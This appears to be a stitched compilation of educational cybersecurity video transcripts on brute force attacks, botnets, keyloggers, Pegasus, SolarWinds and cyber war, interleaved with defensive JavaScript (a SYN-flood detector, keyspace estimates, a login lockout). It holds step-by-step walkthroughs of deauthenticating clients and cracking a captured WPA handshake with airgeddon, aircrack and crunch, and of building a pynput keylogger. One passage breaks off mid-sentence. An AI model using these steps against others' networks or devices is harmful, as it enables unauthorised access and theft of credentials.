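  const pk = (t, src, dst, flags) => ({ t, src, dst, flags });
  const packets = [];
  // A legitimate client completing one handshake every two seconds.
  for (let i = 0; i < 3; i++) {
    const t = i * 2;
    packets.push(pk(t, '192.168.72.50', TARGET, 'S'));
    packets.push(pk(t + 0.01, TARGET, '192.168.72.50', 'SA'));
    packets.push(pk(t + 0.02, '192.168.72.50', TARGET, 'A'));
  }
  // The flood: 500 bare SYNs inside one second, none of them ever ACKed.
  for (let i = 0; i < 500; i++) {
    packets.push(pk(5 + i / 500, '192.168.72.128', TARGET, 'S'));
    packets.push(pk(5 + i / 500 + 0.0005, TARGET, '192.168.72.128', 'SA'));
  }
  return packets;
}

// Bucket packets sent to `host` into windows of `windowSec` and, per window,
// count SYNs and handshake-completing ACKs per source. A source with many
// SYNs and almost no ACKs is piling up half-open connections (a SYN flood).
// Because floods often spoof sources, the total SYN rate into the host is
// also checked, independent of any single source.
function detectSynFlood(packets, { host, windowSec = 1, minSynPerSource = 100,
                                   maxAckRatio = 0.1, minSynTotal = 1000 }) {
  const windows = new Map(); // window index -> { total, bySrc }
  for (const p of packets) {
    if (p.dst !== host || (p.flags !== 'S' && p.flags !== 'A')) continue;
    const w = Math.floor(p.t / windowSec);
    if (!windows.has(w)) windows.set(w, { total: 0, bySrc: new Map() });
    const win = windows.get(w);
    const s = win.bySrc.get(p.src) || { syn: 0, ack: 0 };
    if (p.flags === 'S') { s.syn += 1; win.total += 1; } else { s.ack += 1; }
    win.bySrc.set(p.src, s);
  }
  const perSource = [];
  const aggregate = [];
  for (const [w, win] of windows) {
    const windowStart = w * windowSec;
    if (win.total >= minSynTotal) aggregate.push({ windowStart, syn: win.total });
    for (const [src, s] of win.bySrc) {
      if (s.syn >= minSynPerSource && s.ack / s.syn <= maxAckRatio) {
        perSource.push({ windowStart, src, syn: s.syn, ack: s.ack });
      }
    }
  }
  return { perSource, aggregate };
}

// The per-source findings are what a "drop it before it reaches the server"
// rule would key on. Per-IP blocking only helps while the source is not
// spoofed, as in the demo; the aggregate alert covers the spoofed case.
function blockList(result) {
  return [...new Set(result.perSource.map((a) => a.src))];
}

function main() {
  const result = detectSynFlood(buildSamplePackets(), { host: TARGET, minSynTotal: 400 });
  console.log(JSON.stringify(result, null, 2));
  console.log('sources to drop:', blockList(result));
}
main();
```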
A brute force attack, also known as brute force cracking, is the cyber attack equivalent of trying every key on your key ring and eventually finding the right one. Brute force attacks are simple and reliable; there is no prior knowledge needed about the victim to start an attack. Most of the systems falling prey to brute force attacks are actually well secured. Attackers let a computer do the work, that is, trying different combinations of usernames and passwords until they find one that works. Due to this repeated trial-and-error format, the strength of the password matters a great deal, although with enough time and resources brute force will break a system, since they run multiple combinations until they find the right passcode.

Hey everyone, this is Baivab from SimplyLearn, and welcome to this video on what is a brute force attack. Let's begin with learning about brute force attacks in detail. A brute force attack, also known as an exhaustive search, is a cryptographic hack that relies on guessing possible combinations of a targeted password until the correct password is discovered. It can be used to break into online accounts, encrypted documents, or even network peripheral devices. The longer the password, the more combinations that will need to be tested. A brute force attack can be time-consuming and difficult to perform if methods such as data obfuscation are used, and at times downright impossible; however, if the password is weak, it could merely take seconds with hardly any effort. Dictionary attacks are an alternative to brute force attacks, where the attacker already has a list of usernames and passwords that need to be tested against the target; it doesn't need to create any other combinations on its own. Dictionary attacks are much more reliable than brute force in a real-world context, but the usefulness depends entirely on the strength of passwords being used by the general population. There is a three-step process when it comes to brute forcing a system. Let's learn about each of them in detail.

In step one we have to settle on a tool that we are going to use for brute forcing. There are some popular names on the market like Hashcat, Hydra, and John the Ripper. While each of them has its own strengths and weaknesses, each of them performs well with the right configuration. All of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cyber security analysts, like Kali Linux and Parrot Security. After deciding what tool to use, we can start generating combinations of alphanumeric variables whose only limitation is the number of characters. For example, while using Hydra, a single six-digit password will create 900,000 passwords with only digits involved; add alphabets and symbols to that sample space and that number grows exponentially. The popular tools allow customizing this process. Let's say the hacker is aware of the password being a specific 8-digit word containing only letters and symbols; this will substantially increase the chances of being able to guess the right password, since we remove the time taken to generate the longer ones, and we omit the need for including digits in such combinations. These small tweaks go a long way in organizing an efficient brute force attack, since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time. In the final step we run these combinations against the file or service that is being broken. We can try and break into a specific encrypted document, a social media account, or even devices at home that connect to the internet. Let's say there is a Wi-Fi router; the generated passwords are then fed into the connection one after the other. It is a long and arduous process, but the work is left to the computer rather than someone manually clicking and checking each of these passcodes. Any password that doesn't unlock the router is discarded, and the brute force tool simply moves on to the next one. This keeps going on until we find the right combination which unlocks the router. Sometimes reaching the success stage takes days and weeks, which makes it cumbersome for people with low computing power at their disposal. However, the ability to crack any system in the world purely due to bad password habits is very appealing, and the general public tends to stick with simple and easy-to-use passwords.

Now that we have a fair idea about how brute force works, let's see if we can answer this question. We learned about how complex passwords are tougher to crack by brute force. Among the ones listed on the screen, which one do you believe will take the longest to be broken when using brute force tools? Leave your answers in the comment section and we will get back to you with the correct option next week.

Let's move on to the harmful effects of getting a system compromised due to brute force attacks. A hacked laptop or mobile can have social media accounts logged in, giving the hackers free access to the victim's connections. It has been reported on multiple occasions that compromised Facebook accounts are sending malicious links and attachments to people on their friends list. One of the significant reasons for hacking: malware infusion is best done when spread from multiple devices, similar to distributing spam; this reduces the chance of circling back the source to a single device which belongs to the hacker. Once brute forced, a system can spread malware via email attachments, sharing links, file upload via FTP, etc. Personal information such as credit card data, usage habits, private images and videos are all stored in our systems, be it in plain format or root folders. A compromised laptop means easy access to this information, which can be further used to impersonate the victim regarding bank verification, among other things. Once a system is hacked it can also be used as a mail server that distributes spam across lists of victims. Since the hacked machines all have different IP addresses and MAC addresses, it becomes challenging to trace the spam back to the original hacker.

With so many harmful implications arising from a brute force attack, it's imperative that the general public be protected against such attacks. Let's learn about some of the ways we can prevent ourselves from becoming a victim of brute force attacks. Using passwords consisting of alphabets, letters, and numbers has a much higher chance of withstanding brute force attacks, thanks to the sheer number of combinations they can produce. The longer the password, the less likely it is that a hacker will devote the time and resources to brute force it. Having alphanumeric passwords also allows the user to keep different passwords for different websites; this is to ensure that if a single account or password is compromised due to a breach or a hack, the rest of the accounts are isolated from the incident. Two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed. This OTP can be obtained either via email, SMS, or specific 2FA applications. Email and SMS-based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked; applications that are specifically made for 2FA purposes are much more reliable and secure. CAPTCHAs are used to stop bots from running through web pages, precisely to prevent brute forcing through their website. Since brute force tools are automated, forcing the hacker to solve a CAPTCHA manually for every iteration of a password is very challenging. The CAPTCHA system can filter out these automated bots that keep refreshing the page with different credentials, thereby reducing the chances of brute force considerably. A definite rule that locks the account being hacked for 30 minutes after a specified number of attempts is a good way to prevent brute force attempts. Many websites lock an account for 30 minutes after three failed password attempts to secure the account against any such attack.
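Two parts of the defensive argument above can be made concrete: how fast the search space grows with the character set and the length range (the six-digit Hydra figure here, and later the charset and min/max length chosen in the Wi-Fi demo), and the three-failures-then-30-minute lockout rule. This is an added example, not the video's code; the function and class names, the policy labels and the guess rate are assumptions.

```javascript
// Added example, not from the video: defender-side calculations for the
// brute force section. keyspace/secondsToExhaust size the offline search
// (a captured handshake); LoginGuard enforces the online lockout rule.
// Names are hypothetical and all numbers are constructed.

// Count of all candidates of length minLen..maxLen over `charsetSize`
// symbols. BigInt is needed: 36^20 alone is far beyond Number's exact range.
function keyspace(charsetSize, minLen, maxLen) {
  const c = BigInt(charsetSize);
  let total = 0n;
  for (let len = minLen; len <= maxLen; len++) total += c ** BigInt(len);
  return total;
}

// Worst-case seconds to exhaust that keyspace at `guessesPerSecond`
// (on average a hit comes after half of it). Returned as a BigInt.
function secondsToExhaust(charsetSize, minLen, maxLen, guessesPerSecond) {
  return keyspace(charsetSize, minLen, maxLen) / BigInt(guessesPerSecond);
}

// Human-readable duration for reporting, largest fitting unit only.
function describeSeconds(seconds) {
  const units = [['years', 31557600n], ['days', 86400n], ['hours', 3600n], ['minutes', 60n]];
  for (const [name, size] of units) if (seconds >= size) return `${seconds / size} ${name}`;
  return `${seconds} seconds`;
}

// Online defence: refuse logins for `lockMs` after `maxFailures` consecutive
// failures, as described above. `now` (ms) is passed in so it is testable,
// and `verify` (the password check) only runs while the account is not locked.
class LoginGuard {
  constructor({ maxFailures = 3, lockMs = 30 * 60 * 1000 } = {}) {
    this.maxFailures = maxFailures;
    this.lockMs = lockMs;
    this.state = new Map(); // username -> { failures, lockedUntil }
  }
  attempt(username, verify, now) {
    const st = this.state.get(username) || { failures: 0, lockedUntil: 0 };
    if (now < st.lockedUntil) {
      return { allowed: false, locked: true, remainingMs: st.lockedUntil - now };
    }
    if (verify()) {
      this.state.delete(username); // success clears the failure counter
      return { allowed: true, locked: false, remainingMs: 0 };
    }
    st.failures += 1;
    if (st.failures >= this.maxFailures) {
      st.lockedUntil = now + this.lockMs;
      st.failures = 0;
    }
    this.state.set(username, st);
    const locked = now < st.lockedUntil;
    return { allowed: false, locked, remainingMs: locked ? st.lockedUntil - now : 0 };
  }
}

function main() {
  // Offline case: constructed policies as [label, charset size, min, max length].
  const policies = [
    ['digits only, 6 characters', 10, 6, 6],
    ['uppercase + digits, 10 to 20 characters', 36, 10, 20],
    ['all printable ASCII, 12 characters', 95, 12, 12],
  ];
  const rate = 100000; // constructed guess rate per second, not a measurement
  for (const [label, c, lo, hi] of policies) {
    const secs = secondsToExhaust(c, lo, hi, rate);
    console.log(`${label}: ${keyspace(c, lo, hi)} candidates, ${describeSeconds(secs)}`);
  }
  // Online case: three wrong passwords, then even the right one is refused.
  const guard = new LoginGuard();
  const wrong = () => false, right = () => true;
  [0, 1000, 2000].forEach((t) => guard.attempt('alice', wrong, t));
  console.log('right password during lock:', guard.attempt('alice', right, 3000));
  console.log('right password after lock:', guard.attempt('alice', right, 2000 + 30 * 60 * 1000));
}
main();
```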
On an additional note, some websites also send an email instructing the user that there have been three insecure attempts to log into the website.

Let's look at a demonstration of how brute force attacks work in a real-world situation. The world has gone wireless, with Wi-Fi taking the reins in every household; it's natural that the security will always be up for debate. To further test the security index and understand brute force attacks, we will attempt to break the password of a Wi-Fi router. For that to happen we first need to capture a handshake file, which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop. The operating system used for this process is Parrot, a Linux distribution that is catered to penetration testers. All the tools being used in this demo can easily be found pre-installed in this operating system. If getting your learning started is half the battle, what if you could do that for free? Visit Skill Up by SimplyLearn; click on the link in the description to know more. To start our demo we're going to use a tool called airgeddon, which is made to hack into wireless networks specifically. At this point it's going to check for all the necessary scripts that are installed in the system. To crack into a Wi-Fi and to capture the handshake file we're going to need an external network card. The significance of the external network card is a managed mode and a monitor mode. For now, the card named WLX1 is my external network adapter, which I'm going to select. To be able to capture data over the air we're going to need to put it in monitor mode; as you can see above, it's written that it is in managed mode right now, so we're going to select option two, which is to put the interface in monitor mode, and its name is now wlan0mon. The monitor mode is necessary to capture data over the air; that is the reason why we need an external card, since a lot of inbuilt cards that come with laptops and systems cannot have a monitor mode installed. Once we select the mode we can go into the fifth option, which is the handshake tools menu. In the first step we have to explore for targets, and it is written that monitor mode is necessary to select a target, so let's explore for targets and press enter. We have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality. For example, this ESSID is supposed to be the Wi-Fi name that we see when connecting to a network: Jio24, Recover Me; these are all the names that we see on our mobile when trying to search for the Wi-Fi. This BSSID is supposed to be an identifier, somewhat like a MAC address, that identifies this network from other devices. The channel feature is on one or two, or there are many channels that the networks can focus on. This here is supposed to be a client that is connected to one such network; for example, the station that you can see, 5626, is supposed to be the MAC address of the device that is connected to a router, and this BSSID is supposed to be which Wi-Fi it is connected to. For example, 5895D8 is this one, which is the Jio24 router, so we already know which router has a device connected to it, and we can use our attack to capture this handshake. Now that it has already run for 1 minute, when we press Ctrl+C we will be asked to select a target. See, it has already selected number five, which is the Jio24 router, as the one with clients, so it is easy to run an attack on and it is easy to capture a handshake for. Select network 5 and we run a capture handshake. It says we have a valid WPA/WPA2 network target selected and that the script can continue. Now, to capture the handshake we have a couple of attacks, a deauth attack or a deauth aireplay attack. What this attack does is kick the clients out of the network; in return, when they try to reconnect to the Wi-Fi (as they are configured that way, that when a client is disconnected it tries to reconnect immediately), it tries to capture a handshake file, which in turn contains the security key which is necessary to initiate the handshake. For our demo let's go with the second option, that is the deauth aireplay attack. Select a timeout value; let's say we give it 60 seconds and we start the script. We can see it capturing data from the Jio24 network, and here we go, we have the WPA handshake file. Once the handshake file is captured we can actually close this, and here we go: congratulations on capturing a handshake. It has verified that a PMKID from the target network has successfully been captured. This is the file that is already stored; it's a .cap file. For the path, let's say we can keep it on the desktop; okay, we give the path and the handshake file is generated. We can already see a target over here, the same Jio24 router with the BSSID. Now if we return to the main menu we already have the handshake file captured with us. Now our job is to brute force into that handshake capture file. The capture file is often encrypted with the security key of the Wi-Fi network; if we know how to decrypt it we will automatically get the security key. So let's go to the offline WPA/WPA2 decrypt menu. Since we'll be cracking personal networks we can go with option one. Now to run the brute force tool we have two options: either we can go with aircrack or we can go with hashcat. Let's go with aircrack plus crunch, which is a brute force attack against a handshake file; we can go with option two. It can already detect the capture file that we have generated, so we select yes. The BSSID is the one which denotes the Jio24 router, so we're going to select yes as well. The minimum length of the key: for example, it has already checked that the minimum length of a Wi-Fi security key, which is a WPA2-PSK key, will always be more than 8 digits and below 64 digits, so we have to select something in this range. So if we already know, let's say, that the password is at least 10 digits, we can go with the minimum length as 10, and as a rough guess let's say we put the maximum length as 20. The character set that we're going to use for checking the password will affect the time taken to brute force. For example, if we already know, or we have seen a user use a password while connecting to the router, something that has only numbers and symbols, then we can choose accordingly. Let's say we go with only uppercase characters and numeric characters; go with option seven and it's going to start decrypting. So this is how aircrack is working right here: you can see this passphrase over here; the first five or six characters are A. It starts working its way from the end, from the last character; it keeps trying every single combination. You can see the fourth character from the right side, the D, will eventually turn to E, because it keeps checking every single character from the end. This will keep going on until all the single characters are tested and every single combination is tried out. Since the handshake file is encrypted using the security key, that is the WPA2 key of the router, whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router. This is the way we can brute force into Wi-Fi routers anywhere in the world.

Cyber attacks are frequently making headlines in today's digital environment. At any time, everyone who uses a computer could become a victim of a cyber attack. There are various kinds of cyber attacks, ranging from phishing to password attacks. In this video we'll look into one such attack that is known as botnet. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon to never miss an update. To begin with, let's take a look at some of the famous bot attacks. The first one is the Mirai botnet, which is a malicious program designed to attack vulnerable IoT devices and infect them to form a network of bots that on command perform basic and medium-level denial of service attacks. Then we have the Zeus bot, specifically designed for
Now let's see what exactly a botnet is. A botnet is a network of hijacked, interconnected devices on which malicious code (malware) has been installed. Each infected device is a bot, and the criminal who hijacked them, known as the bot herder, controls them remotely. Bots are used to automate large-scale attacks, including data theft, server outages, malware propagation and denial-of-service attacks.

Now that we know what a botnet is, let's look at how one works. Building a botnet involves three steps: preparing the botnet army, establishing the connection between the bots and the command-and-control server, and finally launching the attack, which the bot herder does. In the illustration, the bot herder initiates the attack by sending commands to the control server; the devices infected with the malware receive those commands and begin attacking the target system.

Some details on each step. The first step, prepping the botnet army, is to infect as many connected devices as possible, so that there are enough bots to carry out the attack. Devices are turned into bots either by exploiting security gaps in software or websites or through phishing attacks, and the malware is often delivered via Trojan horses. The second step is establishing the connection: once a device is compromised, the malware on it connects the device back to the bot herder's control server, and the herder uses command programming to drive the bots' actions. The last step is launching the attack: once infected, a bot gives the herder admin-level control of the device, enabling gathering and stealing of data, reading and rewriting system data, monitoring user activity, performing denial-of-service attacks and other cyber crimes.
Now let's take a look at botnet architecture. The first type is the client-server model, the traditional model, which operates with the help of a command-and-control (C&C) server and communication protocols like IRC. When the bot herder issues a command to the server, it is relayed to the clients, which perform the malicious actions. Then we have the peer-to-peer model, where the infected bots are controlled over a decentralized peer-to-peer network: the bots are interconnected and each acts as both C&C server and client. Attackers adopt this approach to avoid detection and to eliminate the single point of failure that a central server represents.

Finally, some countermeasures against botnet attacks. The first is to keep drivers and the operating system updated. Next, avoid clicking the random pop-ups or links we often see on the internet. And lastly, having reputable antivirus and anti-spyware software and a firewall installed will protect against malware infection.

The internet is an endless source of information and data, but we still come across occurrences such as cyber attacks, hacking and forced entry that affect our time on the web. In this section we discuss a topic that secretly records our input data: keyloggers.

To understand the keylogging problem better, let's take a look at an example. This is June; she works in a business firm where she manages the company's data regularly. This is Jacob from the information department, who is here to brief her on some security protocols. During the briefing she told him about some problems her system had been facing, including slow response and unusual internet activity.
When Jacob heard about these problems, he considered what could be causing them, and the conclusion he reached was a keylogger. Unaware of the problem her system had, she asked him for some details about it. So for today's topic we learn what keyloggers are, how they affect a system, and what harm keylogging can cause.

To begin with, let's learn what a keylogging program is. As the name suggests, a keylogger is a malicious program or tool designed to record the keystrokes typed during data input and write them to a log file; the same program then secretly sends those log files to its origin, where the hacker can use them for malicious purposes.

Now that we know what a keylogging program is, let's look at how they enter a system. Searching for a suitable driver for the system can lead to the installation of a keylogger, as can visiting suspicious sites and installing uncertified software. Opening unknown links, or visiting unknown websites sent from unknown addresses, can also be the reason a keylogger enters the system. And lastly, there are cases where pop-ups on social or media sites lead to the installation of a keylogging program.

Now that we know how the problem gets into the system, let's look at how to identify whether a system is infected. A keylogger can be suspected when the keyboard often lags behind the system, when the data we type sometimes gets stuck mid-input, when the system freezes for no apparent reason, and when applications running on the system show delayed response times.
Lastly, there are cases when we see suspicious internet activity on the system that we cannot account for; this too can point to an infection.

Now we'll take a look at the different types of keyloggers, which can harm a system in different ways. The first is API-based, the most common kind, which uses the operating system's keyboard APIs to keep a log of the typed data and share it with its origin for malicious purposes; each time we press a key, the keylogger intercepts the event and logs it. Then we have form-grabbing keyloggers which, as the name suggests, capture form data: if we use web forms or other kinds of forms to enter data, the program records it and sends it to its origin. Then we have kernel-based keyloggers, which are installed deep inside the operating system, where they can hide from antivirus software if not checked properly, record the data we type on the keyboard and send it to its origin. And lastly we have hardware keyloggers, which sit directly in the hardware, embedded into the system, where they record what we type on the keyboard.

Now let's look at how hackers use the recorded data. When hackers receive information about a target, they might use it to blackmail the target, affecting their personal life and extorting money. Company data recorded by a keylogger can affect the company's economic value in the market, which may lead to its downfall. And in some cases a keylogger can log data about military secrets, which may include nuclear codes or the security protocols needed to maintain a country's security.
Now let's look at whether mobile devices get infected with keyloggers or not. On handheld devices, keylogger infections are lower compared to computer systems, as they use an on-screen or virtual keyboard, but in some cases we do see malicious programs getting installed on a handheld device if we visit uncertified, illegal or torrent sites. A device infected with a keylogger or another malicious program can lead to the exploitation of its data, including photos, emails or important files, by the hacker or cyber criminal who installed the program.

To prevent our system from getting infected by a keylogging program, consider the following points. The first is using antivirus software or tools which can prevent malicious programs from entering the system. Keeping the system's security updates current is also a good habit. And lastly, use a virtual keyboard to input sensitive data, such as bank details, login details or passwords for different websites.

Now that we have some understanding of keyloggers, let's look at the demo to deepen our knowledge. For the first step we have to install the required library, pynput; when we run the installer, the system says the library is already installed. Next, let's see what modules are required from this library: we import the keyboard module, which lets us capture what is typed, and from it the Key and Listener classes, along with Python's logging module, which will record the data into a log file.

Next we write the code that saves the data recorded by the program into a text file named key_log.txt, with a date and time stamp. We give the file name, key_log.txt, as the log file, and the format in which each entry is written: the message together with the time stamp, expressed with the logging module's percent-style placeholders.

For the next step we define the two functions used in the program, on_press and on_release. on_press runs whenever a key is pressed.
It logs the pressed key, formatted according to the format defined above, as a string entry in the log file. Then we define on_release, which comes into play when the Escape key is released: the program terminates and stops running. Finally, for the program to work, we need to keep these two functions running, passing on_press and on_release to the Listener and joining the listener thread so the recorded keys are written to the log file.

Now that we have completed the code, let's run it; we have to wait a moment while the program starts. To verify it, open Notepad and type "hello world" as a basic check of whether the program is working. Then go back to the main page of the Jupyter notebook, refresh it, and at the bottom we see key_log.txt, the text file we created. Opening it, we see the data recorded as we started, followed by the "hello world" we just typed, which shows that the program is working properly.

Now that we have reached the end of the module, let's take a look at the summary. First we learned what keyloggers are; then we understood the different ways a system gets infected with a keylogger; then we learned how to detect the problem on our system; then we learned the different types of keyloggers; we also understood how hackers use the data recorded by the program, and whether mobile devices get infected with keyloggers; and lastly we understood what measures can be taken to prevent a keylogger from entering the system.
Before we learn about the Pegasus platform, let us understand what spyware is and how it works. Spyware is a category of malware that gathers information about a user or a device straight from the host machine. It is mostly spread through malicious links in email or chat applications: when a link carrying the malware is received, clicking on it activates the spyware, which allows the attacker to spy on the user's information. With some spyware, even clicking the link isn't necessary to trigger the malicious payload. The result is security complications and a further loss of privacy.

One spyware system that has been making the rounds in the tech industry is Pegasus. Pegasus is a spyware system developed by an Israeli company, the NSO Group. It runs mainly on mobile devices, across the major operating systems: Apple's iOS on the iPhone and standard Android versions. This is not a newly developed platform; Pegasus has existed since at least 2016. It is a highly intricate spyware program that can track the user's location, read text messages, scan through files on the phone, and access the device's camera and microphone to record audio and video. Pegasus has all the tools necessary to enforce surveillance for any client that buys its services. Initially, the NSO Group designed the software to be used against terrorist groups.
With more and more encrypted communication channels coming to the forefront, Pegasus was designed to give its operators access to data transmissions that could be a threat to national security. Unfortunately, the people who bought the software had complete control over whom they surveilled, how, and to what extent, and eventually the primary clients became sovereign nations. Spying on information that is supposed to stay private became easy with this service. Multiple devices can be infected with the same spyware to create a network of compromised devices that keeps feeding data back to the operator.

To understand how such a network is created, let's look at how a mobile device gets infected by Pegasus. We all communicate with friends and family over instant messaging apps and email. If you check your inbox regularly you will have noticed spam emails that mail providers like Gmail and Yahoo filter into the spam folder; some of these messages bypass the filter and make it into the inbox looking like generic, harmless emails. The Pegasus spyware exploits such occurrences, delivering malicious messages and links that install the spy software on the user's mobile device, Android or iPhone. This isn't unique to email: targets are equally likely to be reached via SMS, WhatsApp, Instagram, or even the more secure messaging apps like Signal and Threema. Once the malicious link is clicked, the spyware package is downloaded and installed on the device, and the perpetrator who sent the payload can monitor everything the user does. Pegasus can collect private emails, passwords, images, videos and every other piece of information that passes through the device and its network. All this data is transmitted back to a central server, where the spying organization can monitor the activity at a granular level.
And this is not even the surface level: complex spyware like Pegasus can access the root-level files on our phones. These files hold information crucial to the working of the Android and iOS operating systems, and leaking such private information is a massive blow to the security and privacy of an individual. Even information that may seem trivial, like the name of your Wi-Fi network or the last time you ordered an item from Amazon, is valuable to an attacker.

This exploitation is primarily possible because of zero-day vulnerabilities, bugs introduced during software development. Zero-day bugs are ones that have just been discovered, by an independent security company or a researcher, and that the vendor has not yet patched. Once found, the right thing to do is to report them to the developer of the platform, Google for Android or Apple for iOS. However, many critical bugs make their way onto the dark web, where attackers use them to build exploits, which are then sent to unsuspecting users in a link or a message as discussed above. Pegasus was able to compromise the latest devices with all security patches installed: some bugs are never reported to the developers, or cannot be fixed without breaking core functionality, and these become the gateway for spyware to enter the system. You can never be 100% safe, but you can give your best effort to protect yourself.

The one thing where Pegasus stands out is its zero-click capability. Usually, as with spam emails, the malicious code is activated when the user clicks the link; in newer versions of Pegasus and a few other spyware programs, the user doesn't need to click anything. Once the message arrives in the inbox of WhatsApp, Gmail or another chat application, the spyware is activated and everything can be recorded and sent back to the central server.

The primary issue for a victim of spyware is detection.
Unlike crypto miners and Trojans, spying services usually do not demand many system resources, which makes them tough to detect once active. Since many devices slow down after a couple of years, any performance hit caused by such spyware is often attributed by users to poor software longevity, and they do not check for any other cause of the slowdown. Left unchecked, these devices can capture voice and video from the phone's sensors while keeping the owner in the dark.

Let's take a moment to check whether you are aware of the causes of such attacks. How do users fall prey to such spyware programs? (a) by installing untested software, (b) by clicking third-party links from emails and messages, (c) by not keeping their apps and phones updated, or (d) all of the above.

But what about the unaffected devices, the vulnerable ones? While we cannot be certain of our security, there are a few things we can do to harden our devices, be it against Pegasus or the next big spyware on the market. Let's say we are safe now and have time to take the necessary steps to prevent a spyware attack. A primary goal must always be to keep our apps and operating system updated with the latest security patches. The vulnerabilities that exploits target are often discovered by developers at Google and Apple, who ship security patches quickly; this applies to individual apps as well, so keeping them updated is of utmost importance. While even the most secure devices have fallen prey to Pegasus, a security patch may minimize the damage at a later stage or neutralize the spyware platform altogether. Another big factor in the spread of malware is the trend of sideloading Android applications using APK files: apps downloaded from third-party websites go through no security checks and are mostly responsible for adware and spyware infections on user devices.
Avoiding sideloading would be a major step in protecting yourself. We often receive spam emails or texts from people we don't know on social media, accompanied by links that let malware creep onto our device. We should stick to trusted websites and not click on links that redirect us to unknown domains.

Spyware is a controversial segment of governance. While the ramifications are pretty extreme in theory, in practice it severely impacts user privacy under authoritarian regimes; with sufficient resources and a contingency plan, it can alter the false veil of democracy altogether. Even if our daily life is rather simple, we must understand that privacy is not about what we have to hide; it is about the things we have to protect, and it stands for everything we choose to share with the outside world, both rhetorically and literally.

Next we look at the hack which took the world by storm and affected multiple governments and corporations: the SolarWinds attack. Global statistics indicate that upwards of 18,000 customers were affected, potentially needing billions to recover the losses incurred.

The date is December 8, 2020. FireEye, a global leader in cyber security, released a blog post that caught the attention of the entire IT community, and within days it emerged that software known as Orion, developed by SolarWinds Inc., had been compromised with a remote access Trojan, or RAT. The breach was estimated to have been running since the spring of 2020 and went virtually unnoticed for months. The reveal sent the developers of Orion into a frenzy as they quickly released a couple of hotfixes for their platform to mitigate the threat and prevent further damage. But how did this come about? To answer that, we first need to understand the platform at the center of the breach.
SolarWinds, a software company based in Texas, United States, had developed a management platform known as Orion, catering to corporations and governments worldwide. Orion was responsible for monitoring and managing IT administration, including the client's servers, virtualization components and even the network infrastructure of the organizations that bought the platform. SolarWinds claims more than 300,000 clients, including US government agencies and several Fortune 500 companies.

This entire chain can be classified as a supply chain attack. In this variant of cyber crime, attackers target relatively weaker links in an organization's chain of control and delivery, preferably services rendered by a third party, since the organization has no direct control over them. In this case the Orion platform was the target, and the vehicle was its software updates. The update channel for SolarWinds Orion shipped a malicious version carrying malware, a Trojan to be precise. This was possible because the build pipeline that produced the software updates was breached: once that pipeline was compromised, the application's code was open to modification, and malicious code found its way into the shipped software. The remote access Trojan was attached to an update nicknamed Sunburst, which gave the attackers backdoor access to any client running the affected version. On its release, many clients believed the update to be legitimate, since it came from the right source and carried SolarWinds' own code-signing signature, and they had no reason to believe otherwise.

American government agencies were reportedly hit the hardest, with the list of victims including the US Departments of Homeland Security, Treasury and Health. Several private companies like Cisco, Nvidia and Intel were also compromised, according to a list published by the cyber security firm Truesec. Most of the affected companies issued quick updates to fix the vulnerabilities introduced by the software.
While the actual perpetrators have never been caught, it is believed this was an act of cross-border espionage conducted by state-sponsored hackers, attributed to either Russia or China. Before we move forward, a recap of what we learned: what category of malware was responsible for the SolarWinds hack, a virus, a remote access Trojan, spyware or a worm?

Coming to possible reparations, the Biden administration launched a full investigation into the effects and repercussions of this breach. There are a couple of things that we as consumers must always attend to when working our way through the web. Using a password manager is highly recommended, since it can generate strong alphanumeric passwords, and you must use different passwords for different accounts, reducing the chance of a single point of failure should one account be breached. Two-factor authentication apps are also encouraged, since they act as a safety net if attackers get hold of our credentials. Clicking on unknown links received by email is a strict no, as is installing applications from unverified sources. The SolarWinds hack is estimated to have cost the parent company nearly $18 million in remediation, making it one of the biggest hacks in cyberspace history. As recently as July 2021, the attackers were found to have accessed the Microsoft 365 email accounts of some US attorneys as part of the campaign. Organizations like the FBI and CIA are determined to identify those responsible, but the intricacy and the full extent of the breach make that a far more complicated job than it looks on paper.

The day is 26 February 2022. The world is hit with breaking news that Russian state TV channels have been hacked by Anonymous, a hacktivist collective and movement that has made a name taking part in multiple cyber wars over the past decade.
This was in response to Russia's aggression on Ukrainian territory in the hope of annexation. Anonymous hacked the Russian state TV networks to combat propaganda in Russia and highlight the damage to life meted out by the Kremlin in Ukraine. They also leaked the personal information of 120,000 Russian troops and hacked the Russian central bank, stealing 35,000 files. This served as a clear indicator of how cyber war can change the momentum of a battle, something people had never seen so closely.

So what is cyber war? A digital assault, or a series of strikes or hacks against a country, is referred to as cyber war. It has the ability to wreak havoc on government and civilian infrastructure and to disrupt essential systems, causing damage to the state and even death. In this day and age the internet plays a bigger role than just watching videos and learning content; it is where you keep your personal data and carry out financial transactions. So rather than resorting to physical violence, cyber war has become a new means of causing havoc, given the vulnerability of the data passing through the internet. In most circumstances cyber warfare involves one nation-state attacking another; in certain cases the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation's aims. In June 2021, Chinese hackers targeted organizations like Verizon to secure remote access to their networks. Stuxnet was a computer worm designed to attack Iran's nuclear facilities, but it evolved and spread to many other industrial and energy-producing sites in 2010. Since the definition of cyber war is so vague, applying rules and sanctions to digital assaults is even harder, making cyber warfare a lawless land not bound by any rules or policies.

There are multiple ways these attacks can be carried out. A major category of cyber attack is espionage, which entails monitoring other countries to steal critical secrets; this might involve compromising vulnerable computer systems with botnets or spear-phishing attempts before extracting sensitive data.
The next weapon in cyber war is sabotage. Government agencies must identify their sensitive data and the dangers if it is exploited. Insider threats, such as disgruntled or careless personnel, or government staff with ties to the attacking country, can be used by hostile countries or terrorists to steal or destroy information. Denial-of-service attacks overwhelm a website with bogus requests and force it to handle them, preventing real users from accessing it; attacking parties may use this form of assault to disrupt key operations and systems and to stop citizens, military and security officials and research organizations from reaching important websites.

But what benefits does cyber war offer in contrast to traditional physical warfare? The most important advantage is the ability to conduct attacks from anywhere in the world, without having to travel thousands of miles, as long as the attacker and the target are connected to the internet. Organizing and launching cyber wars is relatively less tedious than physical warfare. People living in or fighting for a country are subjected to propaganda attacks that attempt to manipulate their emotions and thoughts. Digital infrastructure is highly crucial to today's world, from communication channels to secure storage servers, so crippling a country's footprint and control on the internet is very damaging.

